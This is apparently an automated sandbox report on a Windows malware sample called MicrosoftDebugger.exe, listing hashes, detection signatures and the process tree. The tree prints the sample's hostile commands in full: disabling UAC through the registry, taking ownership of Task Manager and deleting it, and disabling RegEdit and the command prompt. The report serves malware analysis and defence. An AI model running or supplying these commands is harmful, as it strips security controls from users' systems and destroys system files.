Overview

overview

10

Static

static

3

MicrosoftDebugger.exe

windows7-x64

10

MicrosoftDebugger.exe

windows10-2004-x64

10

Resubmissions

11/06/2024, 19:49

240611-yjqwdsyhjh 10

11/06/2024, 19:47

240611-yhy6daygpg 10

Analysis

  • max time kernel
    1s
  • max time network
    7s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11/06/2024, 19:47

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    MicrosoftDebugger.exe

  • Size

    101KB

  • MD5

    894aae812eb6f72bbd33c795d4db67fb

  • SHA1

    b6e089caab3470431b18316ffd82ea49783d4a72

  • SHA256

    10d6eda28eab6b3c3f3ce1183ddc2ddf39559eaf090d794b95b2c481b25241a5

  • SHA512

    0ad002903e4d0bf50578630f0dfe7f943632c6562871caa07cd527a19ddf50cb2f888334e6574b3fe39ff176fbb0cda60cb1612c96f91921f0421230503baec1

  • SSDEEP

    3072:pJrwXlyq82c0PTuMqSwNd4IYh5eWBgaQE:HYJy0pqDfE

Score
10/10
discoveryevasionexploittrojan

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
    evasiontrojan
  • Disables RegEdit via registry modification 1 IoCs
    evasion
  • Possible privilege escalation attempt 4 IoCs
    exploit
  • Modifies file permissions 1 TTPs 4 IoCs
    discovery
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies registry key 1 TTPs 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\MicrosoftDebugger.exe
    "C:\Users\Admin\AppData\Local\Temp\MicrosoftDebugger.exe"
    1⤵
    • Enumerates system info in registry
    • Suspicious use of WriteProcessMemory
    PID:3024
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3716
      • C:\Windows\SysWOW64\reg.exe
        REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • UAC bypass
        • Modifies registry key
        PID:2076
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c takeown /F "C:\Windows\System32\Taskmgr.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3480
      • C:\Windows\SysWOW64\takeown.exe
        takeown /F "C:\Windows\System32\Taskmgr.exe"
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:3596
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Windows\System32\Taskmgr.exe" /grant "%USERNAME%":(F)
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:856
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Windows\System32\Taskmgr.exe" /grant "Admin":(F)
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:4544
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c takeown /F "C:\Windows\System32\Taskmgr.exe" && icacls "C:\Windows\System32\Taskmgr.exe" /grant "%USERNAME%":(F) && del /F /Q "C:\Windows\System32\Taskmgr.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:916
      • C:\Windows\SysWOW64\takeown.exe
        takeown /F "C:\Windows\System32\Taskmgr.exe"
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:2728
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Windows\System32\Taskmgr.exe" /grant "Admin":(F)
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:2272
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3780
      • C:\Windows\SysWOW64\reg.exe
        REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
        3⤵
        • Disables RegEdit via registry modification
        • Modifies registry key
        PID:2580
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c REG ADD HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 1 /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2212
      • C:\Windows\SysWOW64\reg.exe
        REG ADD HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 1 /f
        3⤵
        • Modifies registry key
        PID:2124

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads